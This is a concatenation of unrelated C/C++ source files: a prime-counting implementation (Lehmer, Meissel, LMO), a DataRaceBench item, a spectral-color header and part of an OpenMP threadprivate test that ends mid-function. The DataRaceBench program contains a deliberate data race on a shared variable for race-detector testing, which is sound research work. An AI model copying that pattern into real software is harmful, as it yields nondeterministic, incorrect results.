if (n > 0 && l->a[n-1].v < val)
croak("Previous value was %lu, inserting %lu out of order\n", l->a[n-1].v, val);
if (n >= l->size) {
UV new_size;
if (l->size == 0) {
new_size = 20000;
if (verbose>2) printf("ALLOCing list, size %lu (%luk)\n", new_size, new_size*sizeof(vc_t)/1024);
New(0, l->a, new_size, vc_t);
} else {
new_size = (UV) (1.5 * l->size);
if (verbose>2) printf("REALLOCing list %p, new size %lu (%luk)\n",l->a,new_size, new_size*sizeof(vc_t)/1024);
Renew( l->a, new_size, vc_t );
}
l->size = new_size;
}
/* printf(" inserting %lu %ld\n", val, count); */
l->a[n].v = val;
l->a[n].c = count;
l->n++;
}
/* Merge the two sorted lists A and B into A. Each list has no duplicates,
* but they may have duplications between the two. We're quite interested
* in saving memory, so first remove all the duplicates, then do an in-place
* merge. */
static void vcarray_merge(vcarray_t* a, vcarray_t* b)
{
long ai, bi, bj, k, kn;
long an = a->n;
long bn = b->n;
vc_t* aa = a->a;
vc_t* ba = b->a;
/* Merge anything in B that appears in A. */
for (ai = 0, bi = 0, bj = 0; bi < bn; bi++) {
UV bval = ba[bi].v;
/* Skip forward in A until empty or aa[ai].v <= ba[bi].v */
while (ai+8 < an && aa[ai+8].v > bval) ai += 8;
while (ai < an && aa[ai ].v > bval) ai++;
/* if A empty then copy the remaining elements */
if (ai >= an) {
if (bi == bj)
bj = bn;
else
while (bi < bn)
ba[bj++] = ba[bi++];
break;
}
if (aa[ai].v == bval)
aa[ai].c += ba[bi].c;
else
ba[bj++] = ba[bi];
}
if (verbose>3) printf(" removed %lu duplicates from b\n", bn - bj);
bn = bj;
if (bn == 0) { /* In case they were all duplicates */
b->n = 0;
return;
}
/* kn = the final merged size. All duplicates are gone, so this is exact. */
kn = an+bn;
if ((long)a->size < kn) { /* Make A big enough to hold kn elements */
UV new_size = (UV) (1.2 * kn);
if (verbose>2) printf("REALLOCing list %p, new size %lu (%luk)\n", a->a, new_size, new_size*sizeof(vc_t)/1024);
Renew( a->a, new_size, vc_t );
aa = a->a; /* this could have been changed by the realloc */
a->size = new_size;
}
/* merge A and B. Very simple using reverse merge. */
ai = an-1;
bi = bn-1;
for (k = kn-1; k >= 0 && bi >= 0; k--) {
UV bval = ba[bi].v;
long startai = ai;
while (ai >= 15 && aa[ai-15].v < bval) ai -= 16;
while (ai >= 3 && aa[ai- 3].v < bval) ai -= 4;
while (ai >= 0 && aa[ai ].v < bval) ai--;
if (startai > ai) {
k = k - (startai - ai) + 1;
memmove(aa+k, aa+ai+1, (startai-ai) * sizeof(vc_t));
} else {
if (ai >= 0 && aa[ai].v == bval) croak("deduplication error");
aa[k] = ba[bi--];
}
}
a->n = kn; /* A now has this many items */
b->n = 0; /* B is marked empty */
}
static void vcarray_remove_zeros(vcarray_t* a)
{
long ai = 0;
long aj = 0;
long an = a->n;
vc_t* aa = a->a;
while (aj < an) {
if (aa[aj].c != 0) {
if (ai != aj)
aa[ai] = aa[aj];
ai++;
}
aj++;
}
a->n = ai;
}
/*
* The main phi(x,a) algorithm. In this implementation, it takes under 10%
* of the total time for the Lehmer algorithm, but is a big memory consumer.
*/
#define NTHRESH (MAX_PHI_MEM/16)
static UV phi(UV x, UV a)
{
UV i, val, sval, lastidx, lastprime;
UV sum = 0;
IV count;
const uint32_t* primes;
vcarray_t a1, a2;
vc_t* arr;
cache_t pcache; /* Cache for recursive phi */
phitableinit();
if (a == 1) return ((x+1)/2);
if (a <= PHIC) return tablephi(x, a);
lastidx = a+1;
primes = generate_small_primes(lastidx);
lastprime = primes[lastidx];
if (x < lastprime) { Safefree(primes); return (x > 0) ? 1 : 0; }
phicache_init(&pcache);
a1 = vcarray_create();
a2 = vcarray_create();
vcarray_insert(&a1, x, 1);
while (a > PHIC) {
UV primea = primes[a];
UV sval_last = 0;
IV sval_count = 0;
arr = a1.a;
for (i = 0; i < a1.n; i++) {
count = arr[i].c;
val = arr[i].v;
sval = FAST_DIV(val, primea);
if (sval < primea) break; /* stop inserting into a2 if small */
if (sval != sval_last) { /* non-merged value. Insert into a2 */
if (sval_last != 0) {
if (sval_last <= lastprime && sval_last < primes[a-1]*primes[a-1])
sum += sval_count*(bs_prime_count(sval_last,primes,lastidx)-a+2);
else
vcarray_insert(&a2, sval_last, sval_count);
}
sval_last = sval;
sval_count = 0;
}
sval_count -= count; /* Accumulate count for this sval */
}
if (sval_last != 0) { /* Insert the last sval */
if (sval_last <= lastprime && sval_last < primes[a-1]*primes[a-1])
sum += sval_count*(bs_prime_count(sval_last,primes,lastidx)-a+2);
else
vcarray_insert(&a2, sval_last, sval_count);
}
/* For each small sval, add up the counts */
for ( ; i < a1.n; i++)
sum -= arr[i].c;
/* Merge a1 and a2 into a1. a2 will be emptied. */
vcarray_merge(&a1, &a2);
/* If we've grown too large, use recursive phi to clip. */
if ( a1.n > NTHRESH ) {
arr = a1.a;
if (verbose > 0) printf("clipping small values at a=%lu a1.n=%lu \n", a, a1.n);
#ifdef _OPENMP
/* #pragma omp parallel for reduction(+: sum) firstprivate(pcache) schedule(dynamic, 16) */
#endif
for (i = 0; i < a1.n-NTHRESH+NTHRESH/50; i++) {
UV j = a1.n - 1 - i;
IV count = arr[j].c;
if (count != 0) {
sum += count * phi_small( arr[j].v, a-1, primes, lastidx, &pcache );
arr[j].c = 0;
}
}
}
vcarray_remove_zeros(&a1);
a--;
}
phicache_free(&pcache);
vcarray_destroy(&a2);
arr = a1.a;
#ifdef _OPENMP
#pragma omp parallel for reduction(+: sum) schedule(dynamic, 16)
#endif
for (i = 0; i < a1.n; i++)
sum += arr[i].c * tablephi( arr[i].v, PHIC );
vcarray_destroy(&a1);
Safefree(primes);
return (UV) sum;
}
extern UV _XS_meissel_pi(UV n);
/* b = prime_count(isqrt(n)) */
static UV Pk_2_p(UV n, UV a, UV b, const uint32_t* primes, uint32_t lastidx)
{
UV lastw, lastwpc, i, P2;
UV lastpc = primes[lastidx];
/* Ensure we have a large enough base sieve */
prime_precalc(isqrt(n / primes[a+1]));
P2 = lastw = lastwpc = 0;
for (i = b; i > a; i--) {
UV w = n / primes[i];
lastwpc = (w <= lastpc) ? bs_prime_count(w, primes, lastidx)
: lastwpc + _XS_prime_count(lastw+1, w);
lastw = w;
P2 += lastwpc;
}
P2 -= ((b+a-2) * (b-a+1) / 2) - a + 1;
return P2;
}
static UV Pk_2(UV n, UV a, UV b)
{
UV lastprime = ((b*3+1) > 203280221) ? 203280221 : b*3+1;
const uint32_t* primes = generate_small_primes(lastprime);
UV P2 = Pk_2_p(n, a, b, primes, lastprime);
Safefree(primes);
return P2;
}
/* Legendre's method. Interesting and a good test for phi(x,a), but Lehmer's
* method is much faster (Legendre: a = pi(n^.5), Lehmer: a = pi(n^.25)) */
UV _XS_legendre_pi(UV n)
{
UV a, phina;
if (n < SIEVE_LIMIT)
return _XS_prime_count(2, n);
a = _XS_legendre_pi(isqrt(n));
/* phina = phi(n, a); */
{ /* The small phi routine is faster for large a */
cache_t pcache;
const uint32_t* primes = 0;
primes = generate_small_primes(a+1);
phicache_init(&pcache);
phina = phi_small(n, a, primes, a+1, &pcache);
phicache_free(&pcache);
Safefree(primes);
}
return phina + a - 1;
}
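/* Worked example (illustrative): for n = 100, a = pi(10) = 4 and
 * phi(100,4) = phi(100,3) - phi(100/7,3) = 26 - 4 = 22, giving
 * pi(100) = 22 + 4 - 1 = 25.  (For n this small the function returns via
 * the sieve shortcut above, but the identity yields the same value.)
 * The guard macro and function are hypothetical. */
#ifdef LEGENDRE_DEMO
static void legendre_demo(void)
{
  UV pi100 = _XS_legendre_pi(100);   /* -> 25 */
  (void) pi100;
}
#endif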
/* Meissel's method. */
UV _XS_meissel_pi(UV n)
{
UV a, b, sum;
if (n < SIEVE_LIMIT)
return _XS_prime_count(2, n);
a = _XS_meissel_pi(icbrt(n)); /* a = Pi(floor(n^1/3)) [max 192725] */
b = _XS_meissel_pi(isqrt(n)); /* b = Pi(floor(n^1/2)) [max 203280221] */
sum = phi(n, a) + a - 1 - Pk_2(n, a, b);
return sum;
}
/* Lehmer's method. This is basically Riesel's Lehmer function (page 22),
* with some additional code to help optimize it. */
UV _XS_lehmer_pi(UV n)
{
UV z, a, b, c, sum, i, j, lastprime, lastpc, lastw, lastwpc;
const uint32_t* primes = 0; /* small prime cache, first b=pi(z)=pi(sqrt(n)) */
DECLARE_TIMING_VARIABLES;
if (n < SIEVE_LIMIT)
return _XS_prime_count(2, n);
/* Protect against overflow. 2^32-1 and 2^64-1 are both divisible by 3. */
if (n == UV_MAX) {
if ( (n%3) == 0 || (n%5) == 0 || (n%7) == 0 || (n%31) == 0 )
n--;
else
return _XS_prime_count(2,n);
}
if (verbose > 0) printf("lehmer %lu stage 1: calculate a,b,c \n", n);
TIMING_START;
z = isqrt(n);
a = _XS_lehmer_pi(isqrt(z)); /* a = Pi(floor(n^1/4)) [max 6542] */
b = _XS_lehmer_pi(z); /* b = Pi(floor(n^1/2)) [max 203280221] */
c = _XS_lehmer_pi(icbrt(n)); /* c = Pi(floor(n^1/3)) [max 192725] */
TIMING_END_PRINT("stage 1")
if (verbose > 0) printf("lehmer %lu stage 2: phi(x,a) (z=%lu a=%lu b=%lu c=%lu)\n", n, z, a, b, c);
TIMING_START;
sum = phi(n, a) + ((b+a-2) * (b-a+1) / 2);
TIMING_END_PRINT("phi(x,a)")
/* We get an array of the first b primes. This is used in stage 4. If we
* get more than necessary, we can use them to speed things up further.
*/
lastprime = b*SIEVE_MULT+1;
if (lastprime > 203280221) lastprime = 203280221;
if (verbose > 0) printf("lehmer %lu stage 3: %lu small primes\n", n, lastprime);
TIMING_START;
primes = generate_small_primes(lastprime);
lastpc = primes[lastprime];
TIMING_END_PRINT("small primes")
TIMING_START;
/* Speed up all the prime counts by doing a big base sieve */
prime_precalc( (UV) pow(n, 3.0/5.0) );
/* Ensure we have the base sieve for big prime_count ( n/primes[i] ). */
/* This is about 75k for n=10^13, 421k for n=10^15, 2.4M for n=10^17 */
prime_precalc(isqrt(n / primes[a+1]));
TIMING_END_PRINT("sieve precalc")
if (verbose > 0) printf("lehmer %lu stage 4: loop %lu to %lu, pc to %lu\n", n, a+1, b, n/primes[a+1]);
TIMING_START;
/* Reverse the i loop so w increases. Count w in segments. */
lastw = 0;
lastwpc = 0;
for (i = b; i >= a+1; i--) {
UV w = n / primes[i];
lastwpc = (w <= lastpc) ? bs_prime_count(w, primes, lastprime)
: lastwpc + _XS_prime_count(lastw+1, w);
lastw = w;
sum = sum - lastwpc;
if (i <= c) {
UV bi = bs_prime_count( isqrt(w), primes, lastprime );
for (j = i; j <= bi; j++) {
sum = sum - bs_prime_count(w / primes[j], primes, lastprime) + j - 1;
}
/* We could wrap the +j-1 in: sum += ((bi+1-i)*(bi+i))/2 - (bi-i+1); */
}
}
TIMING_END_PRINT("stage 4")
Safefree(primes);
return sum;
}
/* The Lagarias-Miller-Odlyzko method.
* Naive implementation without optimizations.
* About the same speed as Lehmer, a bit less memory.
* A better implementation can be 10-50x faster and use much less memory.
*/
UV _XS_LMOS_pi(UV n)
{
UV n13, a, b, sum, i, j, k, lastprime, P2, S1, S2;
const uint32_t* primes = 0; /* small prime cache */
signed char* mu = 0; /* moebius to n^1/3 */
uint32_t* lpf = 0; /* least prime factor to n^1/3 */
cache_t pcache; /* Cache for recursive phi */
DECLARE_TIMING_VARIABLES;
if (n < SIEVE_LIMIT)
return _XS_prime_count(2, n);
n13 = icbrt(n); /* n13 = floor(n^1/3) [max 2642245] */
a = _XS_lehmer_pi(n13); /* a = Pi(floor(n^1/3)) [max 192725] */
b = _XS_lehmer_pi(isqrt(n)); /* b = Pi(floor(n^1/2)) [max 203280221] */
lastprime = b*SIEVE_MULT+1;
if (lastprime > 203280221) lastprime = 203280221;
if (lastprime < n13) lastprime = n13;
primes = generate_small_primes(lastprime);
New(0, mu, n13+1, signed char);
memset(mu, 1, sizeof(signed char) * (n13+1));
Newz(0, lpf, n13+1, uint32_t);
mu[0] = 0;
for (i = 1; i <= n13; i++) {
UV primei = primes[i];
for (j = primei; j <= n13; j += primei) {
mu[j] = -mu[j];
if (lpf[j] == 0) lpf[j] = primei;
}
k = primei * primei;
for (j = k; j <= n13; j += k)
mu[j] = 0;
}
lpf[1] = UVCONST(4294967295); /* Set lpf[1] to max */
/* Remove mu[i] == 0 using lpf */
for (i = 1; i <= n13; i++)
if (mu[i] == 0)
lpf[i] = 0;
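/* Editorial sketch of the state after the sieve above, for small j:
j : 1 2 3 4 5 6 7 8 9 10
mu : 1 -1 -1 0 -1 1 -1 0 0 1
lpf : max 2 3 0 5 2 7 0 0 2 (zeroed wherever mu[j] == 0) */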
/* Thanks to Kim Walisch for help with the S1+S2 calculations. */
k = (a < 7) ? a : 7;
S1 = 0;
S2 = 0;
phicache_init(&pcache);
TIMING_START;
for (i = 1; i <= n13; i++)
if (lpf[i] > primes[k])
/* S1 += mu[i] * phi_small(n/i, k, primes, lastprime, &pcache); */
S1 += mu[i] * phi(n/i, k);
TIMING_END_PRINT("S1")
TIMING_START;
for (i = k; i+1 < a; i++) {
uint32_t p = primes[i+1];
/* TODO: #pragma omp parallel for reduction(+: S2) firstprivate(pcache) schedule(dynamic, 16) */
for (j = (n13/p)+1; j <= n13; j++)
if (lpf[j] > p)
S2 += -mu[j] * phi_small(n / (j*p), i, primes, lastprime, &pcache);
}
TIMING_END_PRINT("S2")
phicache_free(&pcache);
Safefree(lpf);
Safefree(mu);
TIMING_START;
prime_precalc( (UV) pow(n, 2.9/5.0) );
P2 = Pk_2_p(n, a, b, primes, lastprime);
TIMING_END_PRINT("P2")
Safefree(primes);
/* printf("S1 = %lu\nS2 = %lu\na = %lu\nP2 = %lu\n", S1, S2, a, P2); */
sum = (S1 + S2) + a - 1 - P2;
return sum;
}
#ifdef PRIMESIEVE_STANDALONE
int main(int argc, char *argv[])
{
UV n, pi;
double t;
const char* method;
struct timeval t0, t1;
if (argc <= 1) { printf("usage: %s <n> [<method>]\n", argv[0]); return(1); }
n = strtoul(argv[1], 0, 10);
if (n < 2) { printf("Pi(%lu) = 0\n", n); return(0); }
if (argc > 2)
method = argv[2];
else
method = "lehmer";
gettimeofday(&t0, 0);
if (!strcasecmp(method, "lehmer")) { pi = _XS_lehmer_pi(n); }
else if (!strcasecmp(method, "meissel")) { pi = _XS_meissel_pi(n); }
else if (!strcasecmp(method, "legendre")) { pi = _XS_legendre_pi(n); }
else if (!strcasecmp(method, "lmo")) { pi = _XS_LMOS_pi(n); }
else if (!strcasecmp(method, "sieve")) { pi = _XS_prime_count(2, n); }
else {
printf("method must be one of: lehmer, meissel, legendre, lmo, or sieve\n");
return(2);
}
gettimeofday(&t1, 0);
t = (t1.tv_sec-t0.tv_sec); t *= 1000000.0; t += (t1.tv_usec - t0.tv_usec);
printf("%8s Pi(%lu) = %lu in %10.5fs\n", method, n, pi, t / 1000000.0);
return(0);
}
#endif
#else
#include "lehmer.h"
UV _XS_LMOS_pi(UV n) { if (n!=0) croak("Not compiled with Lehmer support"); return 0;}
UV _XS_lehmer_pi(UV n) { if (n!=0) croak("Not compiled with Lehmer support"); return 0;}
UV _XS_meissel_pi(UV n) { if (n!=0) croak("Not compiled with Lehmer support"); return 0;}
UV _XS_legendre_pi(UV n) { if (n!=0) croak("Not compiled with Lehmer support"); return 0;}
#endif
|
DRB010-lastprivatemissing-var-yes.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
This loop has loop-carried output-dependence due to x=... at line 63.
The problem can be solved by using lastprivate(x).
Data race pair: x@63:5 vs. x@63:5
*/
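/* Editorial sketch of the race-free variant suggested above:
#pragma omp parallel for private(i) lastprivate(x)
for (i = 0; i < len; i++)
x = i;
lastprivate(x) copies the value from the logically last iteration back to
the shared x, so the printf below reliably prints x = len-1. */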
#include "omprace.h"
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char* argv[])
{
omprace_init();
int i,x;
int len = 10000;
if (argc>1)
len = atoi(argv[1]);
#pragma omp parallel for private (i)
for (i=0;i<len;i++)
x=i;
printf("x=%d",x);
omprace_fini();
return 0;
}
|
spectrum.h | #pragma once
#include <boost/array.hpp>
#include <cmath>
#include <limits>
#include <vector>
#include "std.h"
#include "glm.h"
#include <boost/range/irange.hpp>
namespace framework {
static inline vec3 xyz_to_rgb(const vec3 & xyz) noexcept {
return vec3{
3.240479f * xyz[0] - 1.537150f * xyz[1] - 0.498535f * xyz[2],
-0.969256f * xyz[0] + 1.875991f * xyz[1] + 0.041556f * xyz[2],
0.055648f * xyz[0] - 0.204043f * xyz[1] + 1.057311f * xyz[2]
};
}
static inline vec3 rgb_to_xyz(const vec3 & rgb) noexcept {
return vec3{
0.412453f * rgb[0] + 0.357580f * rgb[1] + 0.180423f * rgb[2],
0.212671f * rgb[0] + 0.715160f * rgb[1] + 0.072169f * rgb[2],
0.019334f * rgb[0] + 0.119193f * rgb[1] + 0.950227f * rgb[2]
};
}
// Spectral Data Declarations
static const int nCIESamples = 471;
extern const float CIE_X[nCIESamples];
extern const float CIE_Y[nCIESamples];
extern const float CIE_Z[nCIESamples];
extern const float CIE_lambda[nCIESamples];
static const float CIE_Y_integral = 106.856895f;
static const int nRGB2SpectSamples = 32;
extern const float RGB2SpectLambda[nRGB2SpectSamples];
extern const float RGBRefl2SpectWhite[nRGB2SpectSamples];
extern const float RGBRefl2SpectCyan[nRGB2SpectSamples];
extern const float RGBRefl2SpectMagenta[nRGB2SpectSamples];
extern const float RGBRefl2SpectYellow[nRGB2SpectSamples];
extern const float RGBRefl2SpectRed[nRGB2SpectSamples];
extern const float RGBRefl2SpectGreen[nRGB2SpectSamples];
extern const float RGBRefl2SpectBlue[nRGB2SpectSamples];
extern const float RGBIllum2SpectWhite[nRGB2SpectSamples];
extern const float RGBIllum2SpectCyan[nRGB2SpectSamples];
extern const float RGBIllum2SpectMagenta[nRGB2SpectSamples];
extern const float RGBIllum2SpectYellow[nRGB2SpectSamples];
extern const float RGBIllum2SpectRed[nRGB2SpectSamples];
extern const float RGBIllum2SpectGreen[nRGB2SpectSamples];
extern const float RGBIllum2SpectBlue[nRGB2SpectSamples];
template <size_t N> struct spectrum : array<float, N> {
// permit array initialization list syntax
template <typename... floats>
spectrum(floats && ... ts) : array { ts... } {}
// apply f to each coefficient, returning a new spectrum
template <typename F>
inline spectrum map(F f) const noexcept {
spectrum result;
for (size_t i = 0; i < N; ++i) result[i] = f(data()[i]);
return result;
}
// in place modification
template <typename F> inline spectrum & modify(F f) {
for (size_t i = 0;i < N; ++i) f(data()[i]);
return *this;
}
inline spectrum & operator+=(const spectrum & that) {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] += that[i];
return *this;
}
inline spectrum & operator-=(const spectrum & that) {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] -= that[i];
return *this;
}
inline spectrum & operator*=(const spectrum & that) {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] *= that[i];
return *this;
}
inline spectrum & operator/=(const spectrum & that) {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] /= that[i];
return *this;
}
bool operator==(const spectrum & that) const {
if (this == &that) return true; // reference equality, ignoring nan-sense.
for (size_t i = 0; i < N; ++i)
if (data()[i] != that[i]) return false;
return true;
}
bool operator!=(const spectrum & that) const {
return !(*this == that);
}
inline spectrum operator+(const spectrum & that) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] + that[i];
return result;
}
inline spectrum operator-(const spectrum & that) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] - that[i];
return result;
}
// pointwise
inline spectrum operator*(const spectrum & that) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] * that[i];
return result;
}
// pointwise
inline spectrum operator/(const spectrum & that) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] / that[i];
return result;
}
friend inline spectrum operator * (float a, const spectrum & s) {
return s * a;
}
inline spectrum operator*=(float scale) {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] *= scale;
return *this;
}
inline spectrum operator*(float scale) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] * scale;
return result;
}
inline spectrum operator/=(float scale) noexcept {
//#pragma omp simd
for (size_t i = 0; i < N; ++i) data()[i] /= scale;
return *this;
}
inline spectrum operator/(float scale) const noexcept {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = data()[i] / scale;
return result;
}
inline bool is_black() const noexcept {
for (auto && c : data())
if (c != 0.f)
return false;
return true;
}
inline spectrum exp() const noexcept { return map(&expf); }
inline spectrum log() const noexcept { return map(&logf); }
inline spectrum log1p() const noexcept { return map(&log1pf); }
inline spectrum expm1() const noexcept { return map(&expm1f); }
// inner product; lets us express weighted sums of the coefficients.
float dot(const spectrum & that) const noexcept {
float result = 0;
//#pragma omp simd reduction(+:result)
for (size_t i = 0; i < N; ++i) result += data()[i] * that.data()[i];
return result;
}
template <typename ostream>
friend ostream & operator<<(ostream & os, const spectrum & s) {
os << "[";
if (N > 0) os << s[0];
for (size_t i = 1; i < N; ++i)
os << ", " << s[i];
os << "]";
return os;
}
spectrum clamp(float low = 0, float high = std::numeric_limits<float>::infinity()) const {
spectrum result;
//#pragma omp simd
for (size_t i = 0; i < N; ++i) result[i] = glm::clamp(data()[i], low, high);
return result;
}
};
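// Editorial sketch of typical use of the arithmetic above (values are
// hypothetical, not from the original source):
// spectrum<4> a { 1.f, 2.f, 3.f, 4.f };
// spectrum<4> b = a * 0.5f + a; // pointwise scale and add
// float e = a.dot(b); // inner product of coefficients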
static const size_t sampled_lambda_start = 400;
static const size_t sampled_lambda_end = 700;
static const size_t spectral_samples = 60;
extern float average_spectrum_samples(const float * lambda, const float * vals, int n, float lambdaStart, float lambdaEnd);
enum struct spectrum_type {
illuminant,
reflectance
};
struct sampled_spectrum : spectrum<spectral_samples> {
template <typename... floats>
sampled_spectrum(floats && ... ts) : spectrum { ts... } {}
template <size_t N> static sampled_spectrum from_sorted_samples(const float lambda[N], const float v[N]) {
return from_sorted_samples(lambda, v, N);
}
static sampled_spectrum from_sorted_samples(const float * lambda, const float * v, int n) {
sampled_spectrum result;
auto start = float(sampled_lambda_start), end = float(sampled_lambda_end);
for (size_t i = 0; i < spectral_samples; ++i) {
float lambda0 = lerp(start, end, float(i) / spectral_samples);
float lambda1 = lerp(start, end, float(i + 1) / spectral_samples);
result[i] = average_spectrum_samples(lambda, v, n, lambda0, lambda1);
}
return result;
}
template <size_t N> static sampled_spectrum from_samples(const float lambda[N], const float v[N]) {
return from_samples(lambda, v, N);
}
static sampled_spectrum from_samples(const float * lambda, const float * v, int n) {
if (!std::is_sorted(lambda, lambda + n)) {
auto range = boost::irange<int>(0, n);
vector<int> indices(range.begin(), range.end());
std::sort(indices.begin(), indices.end(), [lambda](int a, int b) {
return lambda[a] < lambda[b];
});
vector<float> slambda(n), sv(n);
for (int i = 0; i < n;++i) {
int j = indices[i];
slambda[i] = lambda[j];
sv[i] = v[j];
}
return from_sorted_samples(slambda.data(), sv.data(), n);
} else {
return from_sorted_samples(lambda, v, n);
}
}
static sampled_spectrum from_rgb(vec3 rgb, spectrum_type type = spectrum_type::illuminant);
static sampled_spectrum from_xyz(vec3 xyz, spectrum_type type = spectrum_type::illuminant) {
return from_rgb(xyz_to_rgb(xyz), type);
}
vec3 to_xyz() const noexcept;
vec3 to_rgb() const noexcept {
return xyz_to_rgb(to_xyz());
}
};
}
/*
pbrt source code is Copyright(c) 1998-2015
Matt Pharr, Greg Humphreys, and Wenzel Jakob.
This file is part of pbrt.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Modified by Edward Kmett
*/ |
omp_threadprivate.c | /*
*
* threadprivate is tested in two ways:
* 1. Each thread should get its own local copy of a global variable
* declared threadprivate; otherwise a race condition gives a wrong result.
* 2. The value of the local copy should be retained across two adjacent
* parallel regions.
*/
#include "omp_testsuite.h"
#include <stdlib.h>
#include <stdio.h>
#include <omp.h>
static int sum0 = 0;
#pragma omp threadprivate(sum0)
static int myvalue = 0;
#pragma omp threadprivate(myvalue)
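/* Editorial note: with threadprivate, each thread keeps its own copy of
sum0 and myvalue. The copies persist between consecutive parallel regions
only if dynamic thread adjustment is off and the team size is unchanged,
which is why the tests below call omp_set_dynamic(0). */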
int
check_omp_threadprivate (FILE * logFile)
{
int sum = 0;
int known_sum;
int i;
int iter;
int *data;
int size;
int failed = 0;
int my_random;
omp_set_dynamic (0);
#pragma omp parallel
{
sum0 = 0;
#pragma omp for
for (i = 1; i <= LOOPCOUNT; i++)
{
sum0 = sum0 + i;
} /*end of for */
#pragma omp critical
{
sum = sum + sum0;
} /*end of critical */
} /* end of parallel */
known_sum = (LOOPCOUNT * (LOOPCOUNT + 1)) / 2;
if (known_sum != sum)
{
fprintf (logFile, " known_sum = %d , sum = %d \n", known_sum, sum);
}
/* the next parallel region is just used to get the number of threads */
omp_set_dynamic (0);
#pragma omp parallel
{
#pragma omp master
{
size = omp_get_num_threads ();
data = (int *) malloc (size * sizeof (int));
}
} /* end parallel */
srand (45);
for (iter = 0; iter < 100; iter++)
{
my_random = rand (); /* random number generator is called inside serial region */
/* the first parallel region is used to initialize myvalue and the array with my_random+rank */
#pragma omp parallel
{
int rank;
rank = omp_get_thread_num ();
myvalue = data[rank] = my_random + rank;
}
/* the second parallel region verifies that the value of "myvalue" is retained */
#pragma omp parallel reduction(+:failed)
{
int rank;
rank = omp_get_thread_num ();
failed = failed + (myvalue != data[rank]);
if (myvalue != data[rank])
{
fprintf (logFile, " myvalue = %d, data[rank]= %d\n", myvalue,data[rank]);
}
}
}
free (data);
return (known_sum == sum) && !failed;
} /* end of check_threadprivate */
static int crosssum0 = 0;
/*#pragma omp threadprivate(crosssum0)*/
static int crossmyvalue = 0;
/*#pragma omp threadprivate(crossmyvalue)*/
int
crosscheck_omp_threadprivate (FILE * logFile)
{
int sum = 0;
int known_sum;
int i;
int iter;
int *data;
int size;
int failed = 0;
int my_random;
omp_set_dynamic (0);
#pragma omp parallel
{
crosssum0 = 0;
#pragma omp for
for (i = 1; i <= LOOPCOUNT; i++)
{
crosssum0 = crosssum0 + i;
} /*end of for */
#pragma omp critical
{
sum = sum + crosssum0;
} /*end of critical */
} /* end of parallel */
known_sum = (LOOPCOUNT * (LOOPCOUNT + 1)) / 2;
#pragma omp parallel
{
#pragma omp master
{
